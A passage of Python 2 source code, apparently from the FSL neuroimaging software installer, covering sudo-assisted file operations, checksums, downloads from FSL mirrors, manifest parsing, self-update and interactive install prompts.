if delay:
try:
self.delay = float(delay)
except ValueError:
pass
self.quiet = quiet
def spin_it(self):
while self.busy:
sys.stdout.write(self.spinner.next())
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
if not self.quiet:
self.busy = True
threading.Thread(target=self.spin_it).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
def run_cmd_dropstdout(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=None, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(_, error) = cmd.communicate()
except:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
def run_cmd(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
MsgUser.debug("Will call %s" % (command_line))
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=PIPE, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(output, error) = cmd.communicate()
except:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
MsgUser.debug("Command completed successfully (%s)" % (output))
return output
def run_cmd_displayoutput(command, as_root=False):
'''Run the command and display output.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
MsgUser.debug("Will call %s" % (command_line))
cmd = Popen(
command_line,
stdin=PIPE, stdout=sys.stdout, stderr=sys.stderr)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
return_code = cmd.returncode
else:
return_code = call(command_line)
if return_code:
MsgUser.debug("An error occured (%s)" % (return_code))
raise RunCommandError(return_code)
MsgUser.debug("Command completed successfully")
def check_sudo(sudo_pwd):
command_line = ['sudo', '-S', 'true']
MsgUser.debug("Checking sudo password")
cmd = Popen(
command_line,
stdin=PIPE,
stdout=DEVNULL,
stderr=DEVNULL
)
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
if cmd.returncode != 0:
return False
else:
return True
class SudoPasswordError(Exception):
pass
@memoize
def get_sudo_pwd():
'''Get the sudo password from the user'''
MsgUser.message("We require your password to continue...")
attempts = 0
valid = False
while attempts < 3 and not valid:
sudo_pwd = getpass.getpass('password: ')
valid = check_sudo(sudo_pwd)
if not valid:
MsgUser.failed("Incorrect password")
attempts += 1
if not valid:
raise SudoPasswordError()
return sudo_pwd
class DeletionRefused(Exception):
pass
class SafeDeleteError(Exception):
pass
def safe_delete(fs_object, as_root=False):
'''Delete file/folder, becoming root if necessary.
Run some sanity checks on object'''
banned_items = ['/', '/usr', '/usr/bin', '/usr/local', '/bin',
'/sbin', '/opt', '/Library', '/System', '/System/Library',
'/var', '/tmp', '/var/tmp', '/lib', '/lib64', '/Users',
'/home', '/Applications', '/private', '/etc', '/dev',
'/Network', '/net', '/proc']
if os.path.isdir(fs_object):
del_opts = "-rf"
else:
del_opts = '-f'
if fs_object in banned_items:
raise DeletionRefused('Will not delete %s!' % (fs_object))
command_line = " ".join(('rm', del_opts, fs_object))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise SafeDeleteError(str(e))
return result
class MoveError(Exception):
pass
def move(source, target, as_root):
try:
run_cmd_dropstdout(" ".join(('mv', source, target)), as_root)
except RunCommandError, e:
raise MoveError(str(e))
class IsDirectoryError(Exception):
pass
class CopyFileError(Exception):
pass
def copy_file(fname, destination, as_root):
'''Copy a file using sudo if necessary'''
MsgUser.debug("Copying %s to %s (as root? %s)" % (
fname, destination, as_root))
if os.path.isdir(fname):
raise IsDirectoryError('Source (%s) is a director!' % (fname))
if os.path.isdir(destination):
# Ensure that copying into a folder we have a terminating slash
destination = destination.rstrip('/') + "/"
copy_opts = '-p'
command_line = " ".join(('cp', copy_opts, fname, destination))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise CopyFileError(str(e))
return result
def file_contains(fname, search_for):
'''Equivalent of grep'''
regex = compile(escape(search_for))
found = False
MsgUser.debug("In file_contains.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = True
break
f.close()
return found
def file_contains_1stline(fname, search_for):
'''Equivalent of grep - returns first occurrence'''
regex = compile(escape(search_for))
found = ''
MsgUser.debug("In file_contains_1stline.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = l
break
f.close()
return found
def line_string_replace(line, search_for, replace_with):
return sub(escape(search_for), escape(replace_with), line)
def line_starts_replace(line, search_for, replace_with):
if line.startswith(search_for):
return replace_with + '\n'
return line
class MoveFileError(Exception):
pass
def move_file(from_file, to_file, requires_root=False):
'''Move a file, using /bin/cp via sudo if requested.
Will work around known bugs in python.'''
if requires_root:
try:
run_cmd_dropstdout(" ".join(
("/bin/cp", from_file, to_file)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to move %s (%s)" % (from_file, str(e)))
os.remove(from_file)
else:
try:
move(from_file, to_file, requires_root)
except OSError, e:
# Handle bug in some python versions on OS X writing to NFS home
# folders, Python tries to preserve file flags but NFS can't do
# this. It fails to catch this error and ends up leaving the file
# in the original and new locations!
if e.errno == 45:
# Check if new file has been created:
if os.path.isfile(to_file):
# Check if original exists
if os.path.isfile(from_file):
# Destroy original and continue
os.remove(from_file)
else:
try:
run_cmd_dropstdout("/bin/cp %s %s" % (
from_file, to_file), as_root=False)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to copy from %s (%s)" % (
from_file, str(e)))
os.remove(from_file)
else:
raise
except:
raise
class EditFileError(Exception):
pass
def edit_file(fname, edit_function, search_for, replace_with, requires_root):
'''Search for a simple string in the file given and replace
it with the new text'''
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
line = edit_function(line, search_for, replace_with)
tmpfile.write(line)
src.close()
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
MsgUser.debug(e)
os.remove(tmpfname)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
MsgUser.debug("Modified %s (search %s; replace %s)." % (
fname, search_for, replace_with))
class AddToFileError(Exception):
pass
def add_to_file(fname, add_lines, requires_root):
'''Add lines to end of a file'''
if isinstance(add_lines, basestring):
add_lines = add_lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
tmpfile.write(line)
src.close()
tmpfile.write('\n')
for line in add_lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise AddToFileError("Failed to add to file %s (%s)" % (
fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror + tmpfname + fname)
raise AddToFileError("Failed to add to file %s" % (fname))
MsgUser.debug("Modified %s (added %s)" % (fname, '\n'.join(add_lines)))
class CreateFileError(Exception):
pass
def create_file(fname, lines, requires_root):
'''Create a new file containing lines given'''
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
for line in lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except CreateFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise CreateFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise CreateFileError("Failed to create %s" % (fname))
MsgUser.debug("Created %s (added %s)" % (fname, '\n'.join(lines)))
class UnsupportedOs(Exception):
pass
class Host(object):
'''Work out which platform we are running on'''
o_s = platform.system().lower()
arch = platform.machine()
applever = ''
os_type = os.name
supported = True
if o_s == 'darwin':
vendor = 'apple'
version = Version(platform.release())
(applever, _, _) = platform.mac_ver()
glibc = ''
elif o_s == 'linux':
if hasattr(platform, 'linux_distribution'):
# We have a modern python (>2.4)
(vendor, version, _) = platform.linux_distribution(
full_distribution_name=0)
else:
(vendor, version, _) = platform.dist()
vendor = vendor.lower()
version = Version(version)
glibc = platform.libc_ver()[1]
else:
supported = False
if arch == 'x86_64':
bits = '64'
elif arch == 'i686':
bits = '32'
elif arch == 'Power Macintosh':
bits = ''
def is_writeable(location):
'''Check if we can write to the location given'''
writeable = True
try:
tfile = tempfile.NamedTemporaryFile(mode='w+b', dir=location)
tfile.close()
except OSError, e:
if e.errno == errno.EACCES or e.errno == errno.EPERM:
writeable = False
else:
raise
return writeable
def is_writeable_as_root(location):
'''Check if sudo can write to a given location'''
# This requires us to use sudo
(f, fname) = temp_file_name(mode='w')
f.write("FSL")
f.close()
result = False
tmptarget = '/'.join((location, os.path.basename(fname)))
MsgUser.debug(" ".join(('/bin/cp', fname, tmptarget)))
try:
run_cmd_dropstdout(" ".join(('/bin/cp',
fname, tmptarget)), as_root=True)
result = True
os.remove(fname)
run_cmd_dropstdout(" ".join(('/bin/rm',
'-f', tmptarget)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
os.remove(fname)
result = False
MsgUser.debug("Writeable as root? %s" % (result))
return result
class ChecksumCalcError(Exception):
pass
def sha256File(filename, bs=1048576):
'''Returns the sha256 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
fhash = hashlib.sha256()
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
except ImportError:
# No SHA256 support on python pre-2.5 so call the OS to do it.
try:
result = run_cmd(" ".join(('sha256sum', '-b', filename)))
return parsesha256sumfile(result)
except RunCommandError, e:
MsgUser.debug("SHA256 calculation error %s" % (str(e)))
raise ChecksumCalcError
def parsesha256sumfile(sha256string):
'''Returns sha256 sum extracted from the output of sha256sum or shasum -a
256 from OS X/Linux platforms'''
(sha256, _) = sha256string.split("*")
return sha256.strip()
def md5File(filename, bs=1048576):
'''Returns the MD5 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
fhash = hashlib.md5()
except ImportError:
import md5
fhash = md5.new()
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
def file_checksum(filename, chktype='sha256'):
if chktype == 'sha256':
return sha256File(filename)
if chktype == 'md5':
return md5File(filename)
else:
raise ChecksumCalcError('Unrecognised checksum type')
class OpenUrlError(Exception):
pass
def open_url(url, start=0, timeout=20):
socket.setdefaulttimeout(timeout)
MsgUser.debug("Attempting to download %s." % (url))
try:
req = urllib2.Request(url)
if start != 0:
req.headers['Range'] = 'bytes=%s-' % (start)
rf = urllib2.urlopen(req)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (url, e.msg))
raise OpenUrlError("Cannot find file %s on server (%s). "
"Try again later." % (url, e.msg))
except urllib2.URLError, e:
if type(e.reason) != str:
errno = e.reason.args[0]
message = e.reason.args[1]
if errno == 8:
# Bad host name
MsgUser.debug("%s %s" % (url,
"Unable to find FSL download "
"server in the DNS"))
else:
# Other error
MsgUser.debug("%s %s" % (url, message))
else:
message = e.reason
raise OpenUrlError(
"Cannot find %s (%s). Try again later." % (url, message))
except socket.timeout, e:
MsgUser.debug(e)
raise OpenUrlError("Failed to contact FSL web site. Try again later.")
return rf
class DownloadFileError(Exception):
pass
def download_file(url, localf, timeout=20):
'''Get a file from the url given storing it in the local file specified'''
try:
rf = open_url(url, 0, timeout)
except OpenUrlError, e:
raise DownloadFileError(str(e))
metadata = rf.info()
rf_size = int(metadata.getheaders("Content-Length")[0])
dl_size = 0
block = 16384
x = 0
y = 0
pb = Progress_bar(x, y, rf_size, numeric=True)
for attempt in range(1, 6):
# Attempt download 5 times before giving up
pause = timeout
try:
try:
lf = open(localf, 'ab')
except:
raise DownloadFileError("Failed to create temporary file.")
while True:
buf = rf.read(block)
if not buf:
break
dl_size += len(buf)
lf.write(buf)
pb.update(dl_size)
lf.close()
except (IOError, socket.timeout), e:
MsgUser.debug(e.strerror)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
pause = 0
if dl_size != rf_size:
time.sleep(pause)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
try:
rf = open_url(url, dl_size, timeout)
except OpenUrlError, e:
MsgUser.debug(e)
else:
break
if dl_size != rf_size:
raise DownloadFileError("Failed to download file.")
def build_url_with_protocol(protocol, base, parts):
part_l = [protocol + '://' + base.strip('/')]
part_l.extend([x.strip('/') for x in parts])
return '/'.join(part_l)
def build_url(parts):
part_l = [parts[0].strip('/')]
part_l.extend([x.strip('/') for x in parts[1:]])
return '/'.join(part_l)
class SiteNotResponding(Exception):
pass
def fastest_mirror(main_mirrors, mirrors_file, timeout=20):
'''Find the fastest mirror for FSL downloads.'''
MsgUser.debug("Calculating fastest mirror")
socket.setdefaulttimeout(timeout)
# Get the mirror list from the url
fastestmirrors = {}
mirrorlist = []
for m in main_mirrors:
MsgUser.debug("Trying %s" % (m))
m_url = '/'.join((m.strip('/'), mirrors_file))
MsgUser.debug("Attempting to open %s" % (m_url))
try:
response = urllib2.urlopen(url=m_url)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (m_url, e.msg))
raise SiteNotResponding(e.msg)
except urllib2.URLError, e:
if isinstance(e.reason, socket.timeout):
MsgUser.debug("Time out trying %s" % (m_url))
raise SiteNotResponding(m)
else:
MsgUser.debug(e.reason.args[1])
raise SiteNotResponding(e.reason.args[1])
except socket.timeout, e:
MsgUser.debug(e)
raise SiteNotResponding(str(e))
except Exception, e:
MsgUser.debug("Unhandled exception %s" % (str(e)))
raise
else:
mirrorlist = response.read().strip().split('\n')
MsgUser.debug("Received the following "
"mirror list %s" % (mirrorlist))
continue
if len(mirrorlist) == 0:
raise ServerFailure("Cannot find FSL download servers")
# Check timings from the urls specified
if len(mirrorlist) > 1:
for mirror in mirrorlist:
MsgUser.debug("Trying %s" % (mirror))
then = time.time()
if mirror.startswith('http:'):
serverport = 80
elif mirror.startswith('https:'):
serverport = 443
else:
raise ServerFailure("Unrecognised protocol")
try:
mysock = socket.create_connection((mirror, serverport),
timeout)
pingtime = time.time() - then
mysock.close()
fastestmirrors[pingtime] = mirror
MsgUser.debug("Mirror responded in %s seconds" % (pingtime))
except socket.gaierror, e:
MsgUser.debug("%s can't be resolved" % (e))
except socket.timeout, e:
MsgUser.debug(e)
if len(fastestmirrors) == 0:
raise ServerFailure('Failed to contact any FSL download sites.')
download_url = fastestmirrors[min(fastestmirrors.keys())]
else:
download_url = mirrorlist[0]
return download_url
# Concept:
# Web app creates the following files:
# fslmirrorlist.txt - contains a list of mirror urls
# fslreleases.json - contains the available maps for oses
# mapping to a download url
# {'installer' {
# 'filename': 'fslinstaller.py',
# 'version': '3.0.0',
# 'date': '02/03/2017',
# 'checksum_type', 'sha256',
# 'checksum'},
# 'linux' : {
# 'centos' : {
# 'x86_64': {
# '6': {
# '5.0.9': {
# 'filename': 'fsl-5.0.9-centos6_64.tar.gz',
# 'version': '5.0.9',
# 'date': '01/02/2017',
# 'checksum_type', 'sha256',
# 'checksum': 'abf645662bcf4453235',
# },
# },
# },
# },
# 'rhel' : {'alias': 'centos'}},
# 'apple' : {
# 'darwin' : {
# 'x86_64': {
# '11': {
# ....
# },
# }
@memoize
def get_web_manifest(download_url, timeout=20):
'''Download the FSL manifest from download_url'''
socket.setdefaulttimeout(timeout)
MsgUser.debug("Looking for manifest at %s." % (download_url))
if HAS_JSON:
MsgUser.debug("Downloading JSON file")
return get_json(download_url + Settings.manifest_json)
else:
MsgUser.debug("Downloading CSV file")
return get_csv_dict(download_url + Settings.manifest_csv)
class GetFslDirError(Exception):
pass
@memoize
def get_fsldir(specified_dir=None, install=False):
'''Find the installed version of FSL using FSLDIR
or location of this script'''
def validate_fsldir(directory):
parent = os.path.dirname(directory)
if parent == directory:
raise GetFslDirError(
"%s appears to be the root folder" %
parent)
if not os.path.exists(parent):
raise GetFslDirError(
"%s doesn't exist" %
parent)
if not os.path.isdir(parent):
raise GetFslDirError(
"%s isn't a directory" %
parent)
if (os.path.exists(directory) and not
os.path.exists(os.path.join(
directory, 'etc', 'fslversion'
))):
raise GetFslDirError(
"%s exists and doesn't appear to be an installed FSL folder" %
directory)
if specified_dir:
if install is False:
if not check_fsl_install(specified_dir):
raise GetFslDirError(
"%s isn't an 'fsl' folder" %
specified_dir)
else:
validate_fsldir(specified_dir)
return specified_dir
try:
fsldir = os.environ['FSLDIR']
try:
validate_fsldir(fsldir)
except GetFslDirError:
# FSLDIR environment variable is incorrect!
MsgUser.warning('FSLDIR environment variable '
'does not point at FSL install, ignoring...')
MsgUser.debug('FSLDIR is set to %s - '
'this folder does not appear to exist' % (fsldir))
fsldir = None
else:
fsldir = fsldir.rstrip('/')
if MsgUser.isquiet():
return fsldir
except KeyError:
# Look to see if I'm in an FSL install
try:
my_parent = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
except NameError:
# Running in debugger - __file__ not set, assume it's cwd
my_parent = os.path.dirname(
os.path.dirname(os.getcwd()))
try:
validate_fsldir(my_parent)
fsldir = my_parent
except GetFslDirError:
fsldir = None
if not install:
MsgUser.debug("asking about %s" % (fsldir))
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'inst_loc', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.falied(str(e))
return fsldir
else:
if not MsgUser.isquiet():
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'location', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.failed(str(e))
MsgUser.message(
'''Hint - press Enter to select the default value '''
'''given in the square brackets.
If you are specifying a destination folder this needs to either be an existing
FSL install folder or a folder that doesn't already exist.''')
fsldir = None
else:
raise GetFslDirError(
"I can't locate FSL, try again using '-d <FSLDIR>' "
"to specify where to find the FSL install")
return fsldir
def archive_version(archive):
'''Takes the path to a FSL install file
and works out what version it is.'''
if not os.path.isfile(archive):
raise NotAFslVersion("%s is not a file" % (archive))
else:
# file is of form: fsl-V.V.V-platform.extensions
(_, vstring, _) = archive.strip().split('-', 2)
try:
return Version(vstring)
except ValueError:
raise NotAFslVersion(
"%s doesn't look like "
"a version number" % (vstring))
class NotAFslVersion(Exception):
pass
class GetInstalledVersionError(Exception):
pass
def get_installed_version(fsldir):
'''Takes path to FSLDIR and finds installed version details'''
MsgUser.debug("Looking for fsl in %s" % fsldir)
v_file = os.path.join(fsldir, 'etc', 'fslversion')
if os.path.exists(v_file):
f = open(v_file)
v_string = f.readline()
f.close()
try:
version = Version(v_string.strip())
except ValueError:
raise NotAFslVersion(
"%s not a valid "
"version string" % (v_string.strip()))
else:
MsgUser.debug(
"No version information found - "
"is this actually an FSL dir?")
raise GetInstalledVersionError(
"Cannot find the version information - "
"is this actually an FSL dir?")
MsgUser.debug("Found version %s" % (version))
return version
def which_shell():
return os.path.basename(os.getenv("SHELL"))
class SelfUpdateError(Exception):
pass
def self_update(server_url):
'''Check for and apply an update to myself'''
# See if there is a newer version available
if 'fslinstaller' in sys.argv[0]:
try:
installer = get_installer(server_url)
except GetInstallerError, e:
MsgUser.debug("Failed to get installer version %s." % (str(e)))
raise SelfUpdateError('Failed to get installer version. '
'Please try again later.')
MsgUser.debug("Server has version " + installer['version'])
if Version(installer['version']) <= version:
MsgUser.ok("Installer is up-to-date.")
return
# There is a new version available - download it
MsgUser.message("There is a newer version (%s) of the installer "
"(you have %s) updating..." % (
installer['version'], version))
(_, tmpfname) = temp_file_name(mode='w', close=True)
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), installer['filename']))
download_file(
url=file_url,
localf=tmpfname)
if (
file_checksum(tmpfname, installer['checksum_type']) !=
installer['checksum']):
raise SelfUpdateError(
"Found update to installer but download "
"was corrupt. Please try again later.")
except DownloadFileError, e:
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
MsgUser.debug("Failed to update installer %s." % (str(e)))
raise SelfUpdateError(
'Found update to installer but unable to '
'download the new version. Please try again.')
else:
downloaded = True
# Now run the new installer
# EXEC new script with the options we were given
os.chmod(tmpfname, 0755)
c_args = [sys.executable, tmpfname, ]
c_args.extend(sys.argv[1:])
MsgUser.debug(
"Calling %s %s" % (sys.executable, c_args))
os.execv(sys.executable, c_args)
else:
# We are now running the newly downloaded installer
MsgUser.ok('Installer updated to latest version %s' % (str(version)))
MsgUser.ok("Installer self update successful.")
class ServerFailure(Exception):
pass
class BadVersion(Exception):
pass
class GetInstallerError(Exception):
pass
def get_installer(server_url):
MsgUser.debug("Checking %s for "
"installer information" % (server_url))
manifest = get_web_manifest(server_url)
return manifest['installer']
@memoize
def get_releases(server_url):
'''Return a hash with all information about available
versions for this OS'''
computer = Host
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
os_definition = manifest[computer.o_s][computer.vendor]
except KeyError:
raise UnsupportedOs("%s %s not supported by this installer" % (
computer.o_s, computer.vendor
))
if 'alias' in os_definition.keys():
t_version = computer.version.major
while t_version > 0:
MsgUser.debug("Trying version %s" % (t_version))
try:
os_parent = os_definition['alias'][
str(t_version)]['parent']
break
except KeyError:
MsgUser.debug("...not found")
if t_version == (computer.version.major - 1):
MsgUser.warning(
"%s %s not officially supported "
"- trying to locate support for an earlier version - "
"this may not work" % (
computer.vendor, computer.version.major))
t_version -= 1
if t_version == 0:
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
str(computer.version.major)
))
os_definition = manifest[computer.o_s][os_parent]
if computer.arch not in os_definition.keys():
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.arch
))
os_versions = os_definition[computer.arch]
t_version = computer.version.major
while t_version > 0:
MsgUser.debug("Trying version %s" % (t_version))
if str(t_version) not in os_versions.keys():
MsgUser.debug("...not found")
if t_version == (computer.version.major - 1):
MsgUser.warning(
"%s %s not officially supported "
"- trying to locate support for an earlier version - "
"this may not work" % (
computer.vendor, computer.version.major))
t_version -= 1
else:
break
if t_version == 0:
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.version.major
))
return os_versions[str(t_version)]
class ExtraDownloadError(Exception):
pass
@memoize
def get_extra(server_url, extra_type):
'''Return a hash with all information about available
versions of source code'''
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
extra = manifest[extra_type]
except KeyError:
raise ExtraDownloadError("Unrecognised extra %s" % (extra_type))
return extra
class ImproperlyConfigured(Exception):
pass
def list_releases(url):
releases = get_releases(url)
MsgUser.message("Available FSL versions for this OS:")
MsgUser.debug(releases)
for v in releases.keys():
MsgUser.message("%s\t(%s)" % (v, releases[v]['date']))
def latest_release(url):
releases = get_releases(url)
MsgUser.debug("Got version information: %s" % (releases))
versions = [Version(x) for x in releases.keys()]
MsgUser.debug("Versions: %s" % (versions))
return releases[str(sorted(versions)[-1])]
class InstallInstallerError(Exception):
pass
def install_installer(fsldir):
'''Install this script into $FSLDIR/etc'''
targetfolder = os.path.join(fsldir, 'etc')
as_root = False
installer = os.path.abspath(__file__)
MsgUser.debug(
"Copying fslinstaller (%s) to %s" % (
installer,
targetfolder))
if not is_writeable(targetfolder):
if not is_writeable_as_root(targetfolder):
raise InstallInstallerError("Cannot write to folder as root user.")
else:
as_root = True
copy_file(
installer, os.path.join(targetfolder, "fslinstaller.py"),
as_root)
class InstallQuestions(object):
def __init__(self):
self.questions = {}
self.validators = {}
self.type = {}
self.default = {}
self.defaults = False
def add_question(self, key, question, default, qtype, validation_f):
self.questions[key] = question
self.default[key] = default
self.type[key] = qtype
self.validators[key] = validation_f
def ask_question(self, key, default=None):
# Ask a question
no_answer = True
validator = self.validators[key]
def parse_answer(q_type, answer):
if q_type == 'bool':
if answer.lower() == 'yes':
return True
else:
return False
else:
return answer
if not default:
default = self.default[key]
if self.defaults:
MsgUser.debug(self.questions[key])
MsgUser.debug("Automatically using the default %s" % (default))
self.answers[key] = parse_answer(self.type[key], default)
no_answer = False
while no_answer:
MsgUser.question(
"%s? %s:" % (
self.questions[key],
'[%s]' % (default)))
your_answer = raw_input()
MsgUser.debug("Your answer was %s" % (your_answer))
if your_answer == '':
MsgUser.debug("You want the default")
your_answer = default
if validator(your_answer):
answer = parse_answer(self.type[key], your_answer)
no_answer = False
MsgUser.debug("Returning the answer %s" % (answer))
return answer
def yes_no(answer):
if answer.lower() == 'yes' or answer.lower() == 'no':
return True
else:
MsgUser.message("Please enter yes or no.")
return False
def check_install_location(folder):
'''Don't allow relative paths'''
MsgUser.debug("Checking %s is an absolute path" % (folder))
if (folder == '.' or
folder == '..' or
folder.startswith('./') or
folder.startswith('../') or
folder.startswith('~')):
MsgUser.message("Please enter an absolute path.")
return False
return True
def external_validate(what_to_check):
'''We will validate elsewhere'''
return True
def check_fsl_install(fsldir):
'''Check if this folder contains FSL install'''
MsgUser.debug("Checking %s is an FSL install" % (fsldir))
if os.path.isdir(fsldir):
if os.path.exists(
os.path.join(fsldir, 'etc', 'fslversion')
):
return True
return False
def fsl_downloadname(suffix, version):
return 'fsl-%s-%s' % (
version, suffix)
class Settings(object):
version = version
title = "--- FSL Installer - Version %s ---" % (version)
main_server = 'fsl.fmrib.ox.ac.uk'
mirrors = [build_url_with_protocol('https',
main_server, ('fsldownloads',
'')), ]
mirrors_file = 'fslmirrorlist.txt'
manifest_json = 'manifest.json'
manifest_csv = 'manifest.csv'
main_mirror = mirrors[0]
mirror = main_mirror
applications = ['bin/fslview.app', 'bin/assistant.app']
x11 = {'bad_versions': [],
'download_url': "http://xquartz.macosforge.org/landing/",
'apps': ['XQuartz.app', 'X11.app', ],
'location': "/Applications/Utilities"}
default_location = '/usr/local/fsl'
post_inst_dir = "etc/fslconf"
inst_qus = InstallQuestions()
inst_qus.add_question('version_match',
"The requested version matches the installed "
"version - do you wish to re-install FSL",
'no', 'bool', yes_no)
inst_qus.add_question('location',
"Where would you like the FSL install to be "
"(including the FSL folder name)",
default_location, 'path', check_install_location)
inst_qus.add_question('del_old',
"FSL exists in the current location, "
"would you like to keep a backup of the old "
"version (N.B. You will not be able to use the old "
"version)",
'no', 'bool', yes_no)
inst_qus.add_question('create',
"Install location doesn't exist, should I create it",
'yes', 'bool', yes_no)
inst_qus.add_question('inst_loc',
"Where is the FSL folder (e.g. /usr/local/fsl)",
default_location, 'path', check_fsl_install)
inst_qus.add_question('skipmd5',
"I was unable to download the checksum of "
"the install file so cannot confirm it is correct. "
"Would you like to install anyway",
'no', 'bool', yes_no)
inst_qus.add_question('overwrite',
"There is already a local copy of the file, would "
"you like to overwrite it",
"yes", 'bool', yes_no)
inst_qus.add_question('upgrade',
"Would you like to install upgrade",
"yes", 'bool', yes_no)
inst_qus.add_question('update',
"Would you like to install update",
"yes", 'bool', yes_no)
def get_json(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
return json.load(url)
except OpenUrlError, e:
raise ServerFailure(str(e))
# [ linux, centos, x86_64, 6, filename, 'fname',
# version, 'version', date, 'date', checksum_type, 'checksum_type',
# checksum, 'checksum', supported, 'true/false', notes, 'notes',
# instructions, 'instructions']
# [ linux, redhat, alias, centos, supported, True/false, version, 'version' ]
# [ 'installer', filename, 'fname', version, 'version', date, 'date',
# checksum_type, 'checksum_type', checksum, 'checksum', supported,
# 'true/false', notes, 'notes', instructions, 'instructions']
# [ feeds, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
# [ sources, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
class AutoDict(dict):
'''Automatically create a nested dict'''
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
value = self[item] = type(self)()
return value
def freeze(self):
'''Returns a dict representation of an AutoDict'''
frozen = {}
for k, v in self.items():
if type(v) == type(self):
frozen[k] = v.freeze()
else:
frozen[k] = v
return frozen
def get_csv_dict(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
manifest_reader = csv.reader(
url, delimiter=',', quoting=csv.QUOTE_MINIMAL)
a_dict = AutoDict()
for line in manifest_reader:
MsgUser.debug(line)
if line[0] == 'feeds':
